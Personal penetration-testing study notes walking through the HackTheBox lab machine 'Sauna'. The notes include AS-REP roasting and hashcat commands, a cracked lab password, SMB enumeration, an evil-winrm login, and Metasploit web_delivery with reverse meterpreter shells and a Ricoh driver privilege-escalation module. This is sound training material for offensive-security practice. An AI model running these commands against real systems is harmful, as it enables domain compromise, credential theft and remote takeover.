Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Sauna

Nmap scan:

  • Kerberos
    • Kerberoast?
    • What I did wrong:
      • You can kerberos based on potential users (from a user page) with no pass to gain access
  • SMB secure
    • Can we find user to access it?
  • Website (Microsoft IIS)
    • Can we gain access from here?
    • default credentials?
    • can we use evil winrm (port 5985)?

Kerberoast with no pass:

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmith

hash:

Can we crack it?

hashcat -m 13100 egoHash.txt rockyou.txt -O

13100 didn’t work. krb5asrep is 18200!

find it by doing:

hashcat --help | grep Kerberos
hashcat -m 18200 egoHash.txt rockyou.txt -O

cracked user:

fsmith:Thestrokes23

Pass the hash?:

cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-auth

No, it has to be NTLM hash (we need to crack the hash to

SAM Dump:

cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --sam

TGS?

EGOTISTICAL-BANK.local/fsmith

sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request

Didn’t work but we found HSmith. Can we kerberoast it?

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmith

no

Didn’t work. SMB with user?

enumerate smb shares:

cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175

Access the read shares:

smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\RICOH Aficio SP -U fsmith%Thestrokes23

that’s not a folder! exploit?

on metasploit

Needs a session. Ports open for the server?

NEW:

What is WinRM? Port 5985

WinRM | Metasploit Documentation Penetration Testing Software, Pen Testing Security

Gaining access with metasploit not working. Gain a normal shell then web_delivery?

Update?

use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985

Um

set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985

still a no

evil winrm:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

We get a powershell

use it to go to metasploit (web_delivery):

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
set srvport 6999
run -j
sessions -i 1

It hangs. x64?

set payload windows/x64/meterpreter/reverse_http

Worked!

background session and try the escalation:

use it to gain access with user then escalate with

use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
run

Hanging. Try something faster and come back to this if it’s not working?

exploit suggester:

use post/multi/recon/local_exploit_suggester

Purple worked!